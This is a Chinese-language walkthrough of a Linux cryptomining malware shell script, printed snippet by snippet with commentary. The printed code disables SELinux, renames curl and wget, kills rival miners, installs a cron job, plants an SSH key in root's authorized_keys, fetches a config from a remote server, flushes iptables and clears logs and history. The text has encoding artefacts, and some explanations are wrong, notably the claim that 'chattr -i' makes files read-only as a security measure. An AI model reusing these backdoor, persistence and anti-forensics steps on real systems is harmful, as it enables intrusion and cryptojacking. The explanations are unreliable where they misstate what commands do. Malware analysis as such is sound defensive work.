.jpg)
01.code 1
#!/bin/sh
腳本的第一行,看起來(lái)是一行注釋?zhuān)鋵?shí)并不是。它規(guī)定了接下來(lái)的腳本,將要采用哪一個(gè) SHELL 執(zhí)行。
像我們平常用的 bash、zsh 等,屬于 sh 的超集,這個(gè)腳本使用 sh 作為執(zhí)行的 shell,具有更好的可移植性。
02.Code 2
setenforce 0 2>dev/null echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
setenforce 是 Linux 的 selinux 防火墻配置命令,執(zhí)行 setenforce 0 表示關(guān)閉 selinux 防火墻。2 ?代表的是標(biāo)準(zhǔn)錯(cuò)誤(stderr)的意思。
因此,可以通過(guò)使用重定向符號(hào)將命令的錯(cuò)誤輸出傳送到 /dev/null 設(shè)備來(lái)避免錯(cuò)誤的輸出。這個(gè)設(shè)備是一個(gè)虛擬設(shè)備,意思是什么都不干。非常適合靜悄悄的干壞事。
03.Code 3
sync && echo 3 >/proc/sys/vm/drop_caches
腳本貼心的幫我們釋放了一些內(nèi)存資源,以便獲取更多的資源進(jìn)行挖礦。
眾所周知,Linux 系統(tǒng)會(huì)隨著長(zhǎng)時(shí)間的運(yùn)行,會(huì)產(chǎn)生很多緩存,清理方式就是寫(xiě)一個(gè)數(shù)字到 drop_caches 文件里,這個(gè)數(shù)字通常為 3。
sync 命令將所有未寫(xiě)的系統(tǒng)緩沖區(qū)寫(xiě)到磁盤(pán)中,執(zhí)行之后就可以放心的釋放緩存了。
04.Code 4
crondir='/var/spool/cron/'"$USER" cont=`cat ${crondir}` ssht=`cat /root/.ssh/authorized_keys` echo 1 > /etc/sysupdates rtdir="/etc/sysupdates" bbdir="/usr/bin/curl" bbdira="/usr/bin/cur" ccdir="/usr/bin/wget" ccdira="/usr/bin/wge" mv /usr/bin/wget /usr/bin/get mv /usr/bin/xget /usr/bin/get mv /usr/bin/get /usr/bin/wge mv /usr/bin/curl /usr/bin/url mv /usr/bin/xurl /usr/bin/url mv /usr/bin/url /usr/bin/cur
沒(méi)錯(cuò),上面這些語(yǔ)句就是完成了一些普通的操作。需要注意的是,它使用 mv 命令對(duì)我們常用的一些命令進(jìn)行了重命名。
這在執(zhí)行命令的時(shí)候,就會(huì)顯得分成功能的蛋疼。這腳本已經(jīng)更改了計(jì)算機(jī)的一些文件,屬于犯罪的范疇了。
腳本為了復(fù)用一些功能,抽象出了很多的函數(shù)。我們直接跳到 main 函數(shù)的執(zhí)行,然后看一下這個(gè)過(guò)程。
05.Code 5
首先是 kill_miner_proc 函數(shù)。代碼很長(zhǎng),就不全部貼出來(lái)了。
kill_miner_proc() { ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 ... pkill -f biosetjenkins pkill -f Loopback ... crontab -r rm -rf /var/spool/cron/*
挖礦領(lǐng)域是一個(gè)相愛(ài)相殺的領(lǐng)域。這個(gè)方法首先使用 ps、grep、kill 一套組合,干掉了同行的挖礦腳本,然后停掉了同行的 cron ?腳本,黑吃黑的感覺(jué)。
在這段腳本里,使用了 pkill 命令。這個(gè)命令會(huì)終止進(jìn)程,并按終端號(hào)踢出用戶,比較暴力。
06.Code 6
接下來(lái)執(zhí)行的是 kill_sus_proc 函數(shù)。
ps axf -o "pid"|while read procid do ... done
ps 加上 o 參數(shù),可以指定要輸出的列,在這里只輸出的進(jìn)程的 pid,然后使用 read 函數(shù),對(duì) procid 進(jìn)行遍歷操作。
07.Code 7
ls -l /proc/$procid/exe | grep /tmp if [ $? -ne 1 ] then ... fi
上面就是遍歷操作過(guò)程了,我們可以看到 if 語(yǔ)句的語(yǔ)法。其中 $? 指的是上一個(gè)命令的退出狀態(tài)。
0 表示沒(méi)有錯(cuò)誤,其他任何值表明有錯(cuò)誤。”tmp”是可匹配的字符串,即”-ne”表示不等于。
08.Code 8
ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid do ... done
呵呵,上面又來(lái)了一次循環(huán)遍歷。不過(guò)這次針對(duì)的目標(biāo),是 CPU 使用超過(guò) 40% 的進(jìn)程。這就有點(diǎn)狠了:影響我挖礦的進(jìn)程,都得死!相煎何太急。
09.Code 9
再接下來(lái),腳本針對(duì)不同的用戶屬性,進(jìn)行了不同的操作。
首先是 root 用戶。通過(guò)判斷是否存在 $rtdir 文件,來(lái)確定是否是 root 權(quán)限。
chattr -i /etc/sysupdate* chattr -i /etc/config.json* chattr -i /etc/update.sh* chattr -i /root/.ssh/authorized_keys* chattr -i /etc/networkservice
使用 chattr 命令將一些關(guān)鍵文件設(shè)為只讀屬性,防止不必要的修改是明智的安全措施。然后,操作 cron 程序,把腳本的更新服務(wù)加入到定時(shí)中。
就是下面這段腳本。
10.Code 10
if [ ! -f "/usr/bin/crontab" ] then echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir} else [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab - fi
注意 [[ $cont =~ “update.sh” ]] 這以小段代碼,怪異的很。Shell中內(nèi)置的[[ ]]命令支持字符串的模式匹配。
=~ 可以使用 shell 正則表達(dá)式,這讓它變得非常強(qiáng)大。由于它的輸出結(jié)果為布爾類(lèi)型,因此可以使用||進(jìn)行連接。
而后面的單小括號(hào) (),是的是一個(gè)命令組,括號(hào)中多個(gè)命令之間用分號(hào)隔開(kāi),最后一個(gè)命令可以沒(méi)有分號(hào);和 `cmd` 的效果基本是一樣的。
11.Code 11
搞完了定時(shí)任務(wù),就要配置 ssh 自動(dòng)登錄了,通過(guò)把公鑰追加到信任列表中就可以。
chmod 700 /root/.ssh/ echo >> /root/.ssh/authorized_keys chmod 600 root/.ssh/authorized_keys echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/
12.Code 12
說(shuō)曹操曹操就到,下面的腳本就使用了 “ 進(jìn)行操作。
filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'` if [ "$filesize_config" -ne "$config_size" ] then pkill -f sysupdate rm /etc/config.json downloads $config_url /etc/config.json $config_url_backup else echo "no need download" fi
進(jìn)行一系列操作以獲取配置文件的大小,如果文件大小不符合要求,則重新下載一個(gè)文件。這就用到了 downloads 函數(shù)。
shell 中的函數(shù),看起來(lái)比較怪異,后面的參數(shù)傳遞,就像是腳本傳遞一樣,傳送給函數(shù)。
13.Code 13
downloads $config_url /etc/config.json $config_url_backup
這句話,就傳遞了三個(gè)參數(shù)。當(dāng)然,文件要從遙遠(yuǎn)的服務(wù)器上下載。我們一無(wú)所知,除了域名以 .de 結(jié)尾,表明它是德國(guó)的域名。
downloads() { if [ -f "/usr/bin/curl" ] then echo $1,$2 http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1` if [ "$http_code" -eq "200" ] then curl --connect-timeout 10 --retry 100 $1 > $2 elif [ "$http_code" -eq "405" ] then curl --connect-timeout 10 --retry 100 $1 > $2 else curl --connect-timeout 10 --retry 100 $3 > $2 fi elif [ -f "/usr/bin/cur" ] then http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1` if [ "$http_code" -eq "200" ] then cur --connect-timeout 10 --retry 100 $1 > $2 elif [ "$http_code" -eq "405" ] then cur --connect-timeout 10 --retry 100 $1 > $2 else cur --connect-timeout 10 --retry 100 $3 > $2 fi elif [ -f "/usr/bin/wget" ] then wget --timeout=10 --tries=100 -O $2 $1 if [ $? -ne 0 ] then wget --timeout=10 --tries=100 -O $2 $3 fi elif [ -f "/usr/bin/wge" ] then wge --timeout=10 --tries=100 -O $2 $1 if [ $? -eq 0 ] then wge --timeout=10 --tries=100 -O $2 $3 fi fi }
我覺(jué)得這段代碼的作者寫(xiě)得很差,非常長(zhǎng),沒(méi)有體現(xiàn)自己的實(shí)際水平。應(yīng)該是趕工期,沒(méi)有想好代碼的復(fù)用,才會(huì)寫(xiě)的這么有失水準(zhǔn)。
我們上面說(shuō)到,腳本改了幾個(gè)命令的名字,其中就有 curl。該命令非常強(qiáng)大,以至于腳本作者不得不添加多個(gè)參數(shù)
-
-I:用來(lái)測(cè)試 http 頭信息。
-
-m:設(shè)置最大傳輸時(shí)間。
-
-o:指定保持的文件名。這里是 /dev/null,呃呃呃……
-
-s:靜默模式,不輸出任何東西。
-
–connect-timeout:連接超時(shí)時(shí)間。
-
–retry:重試次數(shù),好狠,100 次。
如果沒(méi)有 curl?那就使用替補(bǔ)的 wget,套路都是一樣的。
14.Code 14
接下來(lái)是一系列相似的操作,最后,對(duì) iptables 一批操作。
iptables -F iptables -X iptables -A OUTPUT -p tcp --dport 3333 -j DROP iptables -A OUTPUT -p tcp --dport 5555 -j DROP iptables -A OUTPUT -p tcp --dport 7777 -j DROP iptables -A OUTPUT -p tcp --dport 9999 -j DROP iptables -I INPUT -s 43.245.222.57 -j DROP service iptables reload
15.Code 15
細(xì)心的腳本編寫(xiě)者,還使用命令清理了操作日志。
history -c echo > /var/spool/mail/root echo > /var/log/wtmp echo > /var/log/secure echo > /root/.bash_history
.png)
